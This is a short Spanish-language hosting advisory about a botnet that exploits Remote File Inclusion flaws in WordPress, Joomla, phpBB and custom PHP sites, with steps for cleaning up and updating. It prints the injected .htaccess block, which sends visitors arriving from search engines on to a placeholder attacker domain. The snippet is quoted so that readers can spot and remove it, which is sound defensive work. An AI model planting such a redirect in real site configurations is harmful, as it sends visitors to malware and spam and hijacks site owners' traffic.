Varios clientes estan siendo afectados por lo que parece ser una
botnet de malware. Esta botnet recorre todas las páginas de un servidor web en busca de vulnerabilidades
RFI (Remote File Inclusion) que consiste en que debido a un fallo o bug de programación el atacante puede
insertar código en algun fichero del atacado.
Sitios basados en
Wordpress,
Joomla,
PhpBB u otros
CMS son los que más probabilidad tienen de ser afectados, pero tambien páginas de usuarios que hayan sido programadas por ellos mismos y no hayan validado todos los parametros de entrada que recibe su aplicación o puesto medidas de seguridad para evitar este fallo.
El ataque normalmente consiste en
introducir una redirección condicional en ficheros .htaccess, para que todas las búsquedas que procedan de una lista de buscadores conocidos, redirecciones del dominio víctima al dominio elegido por el atancante (que normalmente tendrá malware o algun modo de infectación mediante publicidad y spam).
Para mitigar por el momento dicha redirección, se pueden buscar los ficheros .htaccess con un simple gestor de FTP (por ejemplo Filezilla) y si se encuentra en su contenido algo como:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://algun_dominio/alguna-pagina.php?s=xx [R,L]
En tal caso, simplemente con
vaciar el fichero, evitareis la redirección de malware, pero aún seguireis siendo vulnerables a otro posible ataque de RFI.
Por tanto se debe
actualizar a la ultima versión del CMS que se este usando y si es código propio, revisar algunos manuales para evitar RFI.